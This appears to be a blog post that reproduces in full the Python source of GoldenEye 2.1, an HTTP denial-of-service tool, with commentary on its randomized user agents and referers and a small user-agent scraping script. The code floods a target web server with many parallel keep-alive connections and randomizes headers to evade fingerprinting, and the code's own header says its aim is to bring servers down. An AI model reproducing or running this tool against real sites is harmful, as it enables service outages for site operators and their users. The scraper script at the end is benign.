
GoldenEye.py website stress-testing tool: version 2.1 source code

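This is the source code of the GoldenEye stress-testing tool. After a quick read, the code looks fairly clean and readable. I had planned to add Chinese comments as I went, but on reflection that did not seem necessary. It is a little over 600 lines and there is quite a lot to learn from it, so anyone who likes Python may find it worth reading.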

This is the latest version on GitHub, 2.1. Compared with the earlier 2.0 release (2013), the author removed the user agents that were hard-coded into the code:

self.useragents = [
    'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
    'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
    'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
    'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
    'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
    'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
    'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
    'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
    'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
    'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
    'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
    'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
]

and switched to randomly generated ones:

USER_AGENT_PARTS = {
    'os': {
        'linux': {
            'name': [ 'Linux x86_64', 'Linux i386' ],
            'ext': [ 'X11' ]
        },
        'windows': {
            # 'Windows NT.6.2' is spelled this way in the source
            'name': [ 'Windows NT 6.1', 'Windows NT 6.3', 'Windows NT 5.1', 'Windows NT.6.2' ],
            'ext': [ 'WOW64', 'Win64; x64' ]
        },
        'mac': {
            'name': [ 'Macintosh' ],
            'ext': [ 'Intel Mac OS X %d_%d_%d' % (random.randint(10, 11), random.randint(0, 9), random.randint(0, 5)) for i in range(1, 10) ]
        },
    },
    'platform': {
        'webkit': {
            'name': [ 'AppleWebKit/%d.%d' % (random.randint(535, 537), random.randint(1,36)) for i in range(1, 30) ],
            'details': [ 'KHTML, like Gecko' ],
            'extensions': [ 'Chrome/%d.0.%d.%d Safari/%d.%d' % (random.randint(6, 32), random.randint(100, 2000), random.randint(0, 100), random.randint(535, 537), random.randint(1, 36)) for i in range(1, 30) ] + [ 'Version/%d.%d.%d Safari/%d.%d' % (random.randint(4, 6), random.randint(0, 1), random.randint(0, 9), random.randint(535, 537), random.randint(1, 36)) for i in range(1, 10) ]
        },
        'iexplorer': {
            'browser_info': {
                'name': [ 'MSIE 6.0', 'MSIE 6.1', 'MSIE 7.0', 'MSIE 7.0b', 'MSIE 8.0', 'MSIE 9.0', 'MSIE 10.0' ],
                'ext_pre': [ 'compatible', 'Windows; U' ],
                'ext_post': [ 'Trident/%d.0' % i for i in range(4, 6) ] + [ '.NET CLR %d.%d.%d' % (random.randint(1, 3), random.randint(0, 5), random.randint(1000, 30000)) for i in range(1, 10) ]
            }
        },
        'gecko': {
            'name': [ 'Gecko/%d%02d%02d Firefox/%d.0' % (random.randint(2001, 2010), random.randint(1,31), random.randint(1,12) , random.randint(10, 25)) for i in range(1, 30) ],
            'details': [],
            'extensions': []
        }
    }
}
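One detail of the table above is easy to miss: the list comprehensions run once, when the module is loaded, so each process ends up with a fixed pool of pre-generated fragments that is later sampled with random.choice. The sketch below illustrates that pattern in Python 3 with a deliberately trimmed-down table. UA_PARTS and build_user_agent are hypothetical names chosen for this example, not identifiers from the GoldenEye source.

```python
import random

# Hypothetical, trimmed-down parts table (illustration only).
UA_PARTS = {
    "os": ["X11; Linux x86_64", "Windows NT 6.1; WOW64"],
    # Evaluated once at import time: a fixed pool of 5 strings.
    "webkit": [
        "AppleWebKit/%d.%d" % (random.randint(535, 537), random.randint(1, 36))
        for _ in range(5)
    ],
}


def build_user_agent(parts=UA_PARTS, rng=random):
    """Assemble 'Mozilla/5.0 (<os>) <platform> (KHTML, like Gecko)'."""
    os_info = rng.choice(parts["os"])        # pick one OS fragment
    platform = rng.choice(parts["webkit"])   # pick one pre-generated platform
    return "Mozilla/5.0 (%s) %s (KHTML, like Gecko)" % (os_info, platform)


if __name__ == "__main__":
    print(build_user_agent())
```

Because the pool is built at load time, repeated calls can only return combinations of the fragments already in the table. Getting a different pool requires reloading the module or starting a new process.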

 

Referers in 2.0:

self.referers = [
    'http://www.google.com/?q=',
    'http://www.usatoday.com/search/results?q=',
    'http://engadget.search.aol.com/search?q=',
    'http://' + self.host + '/'
]

Referers in 2.1:

self.referers = [
    'http://www.google.com/',
    'http://www.bing.com/',
    'http://www.baidu.com/',
    'http://www.yandex.com/',
    'http://' + self.host + '/'
]

Judging by this change in the referers, Baidu seems to be fairly well known abroad too, haha. The author is rather endearing.


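According to the changelog, the main change is that the author dropped the fixed user-agent list, which he himself called "silly", in favor of randomly generated ones.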

## Changelog
* 2014-02-20  Added randomly created user agents (still RFC compliant).
* 2014-02-19  Removed silly referers and user agents. Improved randomness of referers. Added external user-agent list support.
* 2013-03-26  Changed from threading to multiprocessing. Still has some bugs to resolve like I still don't know how to propperly shutdown the manager.
* 2012-12-09  Initial release

 

Source code (over 600 lines):

#!/usr/bin/env python"""$Id: $     /$$$$$$            /$$       /$$                     /$$$$$$$$                        /$$__  $$          | $$      | $$                    | $$_____/                       | $$  \__/  /$$$$$$ | $$  /$$$$$$$  /$$$$$$  /$$$$$$$ | $$       /$$   /$$  /$$$$$$    | $$ /$$$$ /$$__  $$| $$ /$$__  $$ /$$__  $$| $$__  $$| $$$$$   | $$  | $$ /$$__  $$   | $$|_  $$| $$  \ $$| $$| $$  | $$| $$$$$$$$| $$  \ $$| $$__/   | $$  | $$| $$$$$$$$   | $$  \ $$| $$  | $$| $$| $$  | $$| $$_____/| $$  | $$| $$      | $$  | $$| $$_____/   |  $$$$$$/|  $$$$$$/| $$|  $$$$$$$|  $$$$$$$| $$  | $$| $$$$$$$$|  $$$$$$$|  $$$$$$$    \______/  \______/ |__/ \_______/ \_______/|__/  |__/|________/ \____  $$ \_______/                                                                     /$$  | $$                                                                              |  $$$$$$/                                                                               \______/                                                                                                                                                                                                                 This tool is a dos tool that is meant to put heavy load on HTTP serversin order to bring them to their knees by exhausting the resource pool.This tool is meant for research purposes onlyand any malicious usage of this tool is prohibited.@author Jan Seidl <http://wroot.org/>@date 2014-02-18@version 2.1@TODO Test in python 3.xLICENSE:This software is distributed under the GNU General Public License version 3 (GPLv3)LEGAL NOTICE:THIS SOFTWARE IS PROVIDED FOR EDUCATIONAL USE ONLY!IF YOU ENGAGE IN ANY ILLEGAL ACTIVITYTHE AUTHOR DOES NOT TAKE ANY RESPONSIBILITY FOR IT.BY USING THIS SOFTWARE YOU AGREE WITH THESE TERMS."""from multiprocessing import Process, Manager, Poolimport urlparse, sslimport sys, getopt, random, time, os# Python version-specific if  sys.version_info < (3,0):    # Python 2.x    import 
httplib    HTTPCLIENT = httplibelse:    # Python 3.x    import http.client    HTTPCLIENT = http.client##### Config####DEBUG = False##### Constants####METHOD_GET  = getMETHOD_POST = postMETHOD_RAND = randomJOIN_TIMEOUT=1.0DEFAULT_WORKERS=10DEFAULT_SOCKETS=500GOLDENEYE_BANNER = GoldenEye v2.1 by Jan Seidl <jseidl@wroot.org>USER_AGENT_PARTS = {    os: {        linux: {            name: [ Linux x86_64, Linux i386 ],            ext: [ X11 ]        },        windows: {            name: [ Windows NT 6.1, Windows NT 6.3, Windows NT 5.1, Windows NT.6.2 ],            ext: [ WOW64, Win64; x64 ]        },        mac: {            name: [ Macintosh ],            ext: [ Intel Mac OS X %d_%d_%d % (random.randint(10, 11), random.randint(0, 9), random.randint(0, 5)) for i in range(1, 10) ]        },    },    platform: {        webkit: {            name: [ AppleWebKit/%d.%d % (random.randint(535, 537), random.randint(1,36)) for i in range(1, 30) ],            details: [ KHTML, like Gecko ],            extensions: [ Chrome/%d.0.%d.%d Safari/%d.%d % (random.randint(6, 32), random.randint(100, 2000), random.randint(0, 100), random.randint(535, 537), random.randint(1, 36)) for i in range(1, 30) ] + [ Version/%d.%d.%d Safari/%d.%d % (random.randint(4, 6), random.randint(0, 1), random.randint(0, 9), random.randint(535, 537), random.randint(1, 36)) for i in range(1, 10) ]        },        iexplorer: {            browser_info: {                name: [ MSIE 6.0, MSIE 6.1, MSIE 7.0, MSIE 7.0b, MSIE 8.0, MSIE 9.0, MSIE 10.0 ],                ext_pre: [ compatible, Windows; U ],                ext_post: [ Trident/%d.0 % i for i in range(4, 6) ] + [ .NET CLR %d.%d.%d % (random.randint(1, 3), random.randint(0, 5), random.randint(1000, 30000)) for i in range(1, 10) ]            }        },        gecko: {            name: [ Gecko/%d%02d%02d Firefox/%d.0 % (random.randint(2001, 2010), random.randint(1,31), random.randint(1,12) , random.randint(10, 25)) for i in range(1, 30) ],            details: 
[],            extensions: []        }    }}##### GoldenEye Class####class GoldenEye(object):    # Counters    counter = [0, 0]    last_counter = [0, 0]    # Containers    workersQueue = []    manager = None    useragents = []    # Properties    url = None    # Options    nr_workers = DEFAULT_WORKERS    nr_sockets = DEFAULT_SOCKETS    method = METHOD_GET    def __init__(self, url):        # Set URL        self.url = url        # Initialize Manager        self.manager = Manager()        # Initialize Counters        self.counter = self.manager.list((0, 0))    def exit(self):        self.stats()        print "Shutting down GoldenEye"    def __del__(self):        self.exit()    def printHeader(self):        # Taunt!        print        print GOLDENEYE_BANNER        print    # Do the fun!    def fire(self):        self.printHeader()        print "Hitting webserver in mode ‘{0}‘ with {1} workers running {2} connections each. Hit CTRL+C to cancel.".format(self.method, self.nr_workers, self.nr_sockets)        if DEBUG:            print "Starting {0} concurrent workers".format(self.nr_workers)        # Start workers        for i in range(int(self.nr_workers)):            try:                worker = Striker(self.url, self.nr_sockets, self.counter)                worker.useragents = self.useragents                worker.method = self.method                self.workersQueue.append(worker)                worker.start()            except (Exception):                error("Failed to start worker {0}".format(i))                pass         if DEBUG:            print "Initiating monitor"        self.monitor()    def stats(self):        try:            if self.counter[0] > 0 or self.counter[1] > 0:                print "{0} GoldenEye strikes deferred. 
({1} Failed)".format(self.counter[0], self.counter[1])                if self.counter[0] > 0 and self.counter[1] > 0 and self.last_counter[0] == self.counter[0] and self.counter[1] > self.last_counter[1]:                    print "\tServer may be DOWN!"                    self.last_counter[0] = self.counter[0]                self.last_counter[1] = self.counter[1]        except (Exception):            pass # silently ignore    def monitor(self):        while len(self.workersQueue) > 0:            try:                for worker in self.workersQueue:                    if worker is not None and worker.is_alive():                        worker.join(JOIN_TIMEOUT)                    else:                        self.workersQueue.remove(worker)                self.stats()            except (KeyboardInterrupt, SystemExit):                print "CTRL+C received. Killing all workers"                for worker in self.workersQueue:                    try:                        if DEBUG:                            print "Killing worker {0}".format(worker.name)                        #worker.terminate()                        worker.stop()                    except Exception, ex:                        pass # silently ignore                if DEBUG:                    raise                else:                    pass##### Striker Class####class Striker(Process):            # Counters    request_count = 0    failed_count = 0    # Containers    url = None    host = None    port = 80    ssl = False    referers = []    useragents = []    socks = []    counter = None    nr_socks = DEFAULT_SOCKETS    # Flags    runnable = True    # Options    method = METHOD_GET    def __init__(self, url, nr_sockets, counter):        super(Striker, self).__init__()        self.counter = counter        self.nr_socks = nr_sockets        parsedUrl = urlparse.urlparse(url)        if parsedUrl.scheme == https:            self.ssl = True        self.host = parsedUrl.netloc.split(:)[0]        self.url = 
parsedUrl.path        self.port = parsedUrl.port        if not self.port:            self.port = 80 if not self.ssl else 443        self.referers = [             http://www.google.com/,            http://www.bing.com/,            http://www.baidu.com/,            http://www.yandex.com/,            http:// + self.host + /            ]    def __del__(self):        self.stop()    #builds random ascii string    def buildblock(self, size):        out_str = ‘‘        _LOWERCASE = range(97, 122)        _UPPERCASE = range(65, 90)        _NUMERIC   = range(48, 57)        validChars = _LOWERCASE + _UPPERCASE + _NUMERIC        for i in range(0, size):            a = random.choice(validChars)            out_str += chr(a)        return out_str    def run(self):        if DEBUG:            print "Starting worker {0}".format(self.name)        while self.runnable:            try:                for i in range(self.nr_socks):                                    if self.ssl:                        c = HTTPCLIENT.HTTPSConnection(self.host, self.port)                    else:                        c = HTTPCLIENT.HTTPConnection(self.host, self.port)                    self.socks.append(c)                for conn_req in self.socks:                    (url, headers) = self.createPayload()                    method = random.choice([METHOD_GET, METHOD_POST]) if self.method == METHOD_RAND else self.method                    conn_req.request(method.upper(), url, None, headers)                for conn_resp in self.socks:                    resp = conn_resp.getresponse()                    self.incCounter()                self.closeConnections()                            except:                self.incFailed()                if DEBUG:                    raise                else:                    pass # silently ignore        if DEBUG:            print "Worker {0} completed run. 
Sleeping...".format(self.name)                def closeConnections(self):        for conn in self.socks:            try:                conn.close()            except:                pass # silently ignore                def createPayload(self):        req_url, headers = self.generateData()        random_keys = headers.keys()        random.shuffle(random_keys)        random_headers = {}                for header_name in random_keys:            random_headers[header_name] = headers[header_name]        return (req_url, random_headers)    def generateQueryString(self, ammount = 1):        queryString = []        for i in range(ammount):            key = self.buildblock(random.randint(3,10))            value = self.buildblock(random.randint(3,20))            element = "{0}={1}".format(key, value)            queryString.append(element)        return &.join(queryString)                    def generateData(self):        returnCode = 0        param_joiner = "?"        if len(self.url) == 0:            self.url = /        if self.url.count("?") > 0:            param_joiner = "&"        request_url = self.generateRequestUrl(param_joiner)        http_headers = self.generateRandomHeaders()        return (request_url, http_headers)    def generateRequestUrl(self, param_joiner = ?):        return self.url + param_joiner + self.generateQueryString(random.randint(1,5))    def getUserAgent(self):        if self.useragents:            return random.choice(self.useragents)        # Mozilla/[version] ([system and browser information]) [platform] ([platform details]) [extensions]        ## Mozilla Version        mozilla_version = "Mozilla/5.0" # hardcoded for now, almost every browser is on this version except IE6        ## System And Browser Information        # Choose random OS        os = USER_AGENT_PARTS[os][random.choice(USER_AGENT_PARTS[os].keys())]        os_name = random.choice(os[name])         sysinfo = os_name        # Choose random platform        platform = 
USER_AGENT_PARTS[platform][random.choice(USER_AGENT_PARTS[platform].keys())]        # Get Browser Information if available        if browser_info in platform and platform[browser_info]:            browser = platform[browser_info]            browser_string = random.choice(browser[name])            if ext_pre in browser:                browser_string = "%s; %s" % (random.choice(browser[ext_pre]), browser_string)            sysinfo = "%s; %s" % (browser_string, sysinfo)            if ext_post in browser:                sysinfo = "%s; %s" % (sysinfo, random.choice(browser[ext_post]))        if ext in os and os[ext]:            sysinfo = "%s; %s" % (sysinfo, random.choice(os[ext]))        ua_string = "%s (%s)" % (mozilla_version, sysinfo)        if name in platform and platform[name]:            ua_string = "%s %s" % (ua_string, random.choice(platform[name]))        if details in platform and platform[details]:            ua_string = "%s (%s)" % (ua_string, random.choice(platform[details]) if len(platform[details]) > 1 else platform[details][0] )        if extensions in platform and platform[extensions]:            ua_string = "%s %s" % (ua_string, random.choice(platform[extensions]))        return ua_string    def generateRandomHeaders(self):        # Random no-cache entries        noCacheDirectives = [no-cache, max-age=0]        random.shuffle(noCacheDirectives)        nrNoCache = random.randint(1, (len(noCacheDirectives)-1))        noCache = , .join(noCacheDirectives[:nrNoCache])        # Random accept encoding        acceptEncoding = [\‘\‘,*,identity,gzip,deflate]        random.shuffle(acceptEncoding)        nrEncodings = random.randint(1,len(acceptEncoding)/2)        roundEncodings = acceptEncoding[:nrEncodings]        http_headers = {            User-Agent: self.getUserAgent(),            Cache-Control: noCache,            Accept-Encoding: , .join(roundEncodings),            Connection: keep-alive,            Keep-Alive: random.randint(1,1000),            Host: 
self.host,        }            # Randomly-added headers        # These headers are optional and are         # randomly sent thus making the        # header count random and unfingerprintable        if random.randrange(2) == 0:            # Random accept-charset            acceptCharset = [ ISO-8859-1, utf-8, Windows-1251, ISO-8859-2, ISO-8859-15, ]            random.shuffle(acceptCharset)            http_headers[Accept-Charset] = {0},{1};q={2},*;q={3}.format(acceptCharset[0], acceptCharset[1],round(random.random(), 1), round(random.random(), 1))        if random.randrange(2) == 0:            # Random Referer            url_part = self.buildblock(random.randint(5,10))            random_referer = random.choice(self.referers) + url_part                        if random.randrange(2) == 0:                random_referer = random_referer + ? + self.generateQueryString(random.randint(1, 10))            http_headers[Referer] = random_referer        if random.randrange(2) == 0:            # Random Content-Trype            http_headers[Content-Type] = random.choice([multipart/form-data, application/x-url-encoded])        if random.randrange(2) == 0:            # Random Cookie            http_headers[Cookie] = self.generateQueryString(random.randint(1, 5))        return http_headers    # Housekeeping    def stop(self):        self.runnable = False        self.closeConnections()        self.terminate()    # Counter Functions    def incCounter(self):        try:            self.counter[0] += 1        except (Exception):            pass    def incFailed(self):        try:            self.counter[1] += 1        except (Exception):            pass        ######### Other Functions####def usage():    print    print -----------------------------------------------------------------------------------------------------------    print    print GOLDENEYE_BANNER    print     print  USAGE: ./goldeneye.py <url> [OPTIONS]    print    print  OPTIONS:    print \t 
Flag\t\t\tDescription\t\t\t\t\t\tDefault    print \t -u, --useragents\tFile with user-agents to use\t\t\t\t(default: randomly generated)    print \t -w, --workers\t\tNumber of concurrent workers\t\t\t\t(default: {0}).format(DEFAULT_WORKERS)    print \t -s, --sockets\t\tNumber of concurrent sockets\t\t\t\t(default: {0}).format(DEFAULT_SOCKETS)    print \t -m, --method\t\tHTTP Method to use \‘get\‘ or \‘post\‘  or \‘random\‘\t\t(default: get)    print \t -d, --debug\t\tEnable Debug Mode [more verbose output]\t\t\t(default: False)    print \t -h, --help\t\tShows this help    print    print -----------------------------------------------------------------------------------------------------------    def error(msg):    # print help information and exit:    sys.stderr.write(str(msg+"\n"))    usage()    sys.exit(2)##### Main####def main():        try:        if len(sys.argv) < 2:            error(Please supply at least the URL)        url = sys.argv[1]        if url == -h:            usage()            sys.exit()        if url[0:4].lower() != http:            error("Invalid URL supplied")        if url == None:            error("No URL supplied")        opts, args = getopt.getopt(sys.argv[2:], "dhw:s:m:u:", ["debug", "help", "workers", "sockets", "method", "useragents" ])        workers = DEFAULT_WORKERS        socks = DEFAULT_SOCKETS        method = METHOD_GET        uas_file = None        useragents = []        for o, a in opts:            if o in ("-h", "--help"):                usage()                sys.exit()            elif o in ("-u", "--useragents"):                uas_file = a            elif o in ("-s", "--sockets"):                socks = int(a)            elif o in ("-w", "--workers"):                workers = int(a)            elif o in ("-d", "--debug"):                global DEBUG                DEBUG = True            elif o in ("-m", "--method"):                if a in (METHOD_GET, METHOD_POST, METHOD_RAND):                    method = a                
else:                    error("method {0} is invalid".format(a))            else:                error("option ‘"+o+"‘ doesn‘t exists")        if uas_file:            try:                with open(uas_file) as f:                    useragents = f.readlines()            except EnvironmentError:                    error("cannot read file {0}".format(uas_file))        goldeneye = GoldenEye(url)        goldeneye.useragents = useragents        goldeneye.nr_workers = workers        goldeneye.method = method        goldeneye.nr_sockets = socks        goldeneye.fire()    except getopt.GetoptError, err:        # print help information and exit:        sys.stderr.write(str(err))        usage()        sys.exit(2)if __name__ == "__main__":    main()
goldeneye.py

 

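The bundled helper is also quite useful: it is a script that scrapes UAs from http://www.useragentstring.com/, probably about as minimal as such a script can get. It also works as a small introductory BeautifulSoup example.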

To use the script, first open: http://www.useragentstring.com/pages/useragentstring.php

Then go into one of the entries, for example Firefox, to get a URL like this: http://www.useragentstring.com/pages/Firefox/

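Then run the script below with that last URL as its argument, and it will scrape a large number of UA strings. I had assumed it would parse them automatically and save them to a file for the main program to load, rather than the main program generating UAs at random as it does now.

Judging by this, though, the author will probably integrate the two in the next update; otherwise this 0.1 script does not have much use.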

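#!/usr/bin/env python
# Python 2 script: prints the user-agent strings found on a
# useragentstring.com list page, one per line.
import urllib, sys
from bs4 import BeautifulSoup

if len(sys.argv) <= 1:
    print "No URL specified. Please supply a valid http://www.useragentstring.com/ UA list URL"
    sys.exit(1)

ua_url = sys.argv[1]

# Download the list page
f = urllib.urlopen(ua_url)
html_doc = f.read()

# The UA entries are <li> elements inside the element with id="liste"
soup = BeautifulSoup(html_doc)
liste = soup.find(id='liste')
# Guard against pages that have no such element at all
uas = liste.find_all('li') if liste is not None else []

if len(uas) <= 0:
    print "No UAs Found. Are you on http://www.useragentstring.com/ lists?"
    sys.exit(1)

for ua in uas:
    ua_string = ua.get_text()
    ua_string = ua_string.strip(' \t\n\r')
    print ua_string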
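The workflow described above (save the scraped UAs to a file, then have another program load them) could be sketched roughly as follows. This is a minimal Python 3 sketch, assuming the scraper's output has been redirected to a plain text file with one UA per line. load_user_agents and pick_user_agent are hypothetical helper names, not functions from GoldenEye.

```python
import random


def load_user_agents(path):
    """Read one user agent per line, dropping blank lines and
    surrounding whitespace (including the trailing newline)."""
    with open(path, encoding="utf-8") as handle:
        return [line.strip() for line in handle if line.strip()]


def pick_user_agent(user_agents, fallback="Mozilla/5.0"):
    """Return a random entry, or the fallback if the list is empty."""
    return random.choice(user_agents) if user_agents else fallback
```

Stripping each line matters here: a bare readlines() keeps the trailing newline on every entry, and that newline would then end up inside any header value built from it.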

 
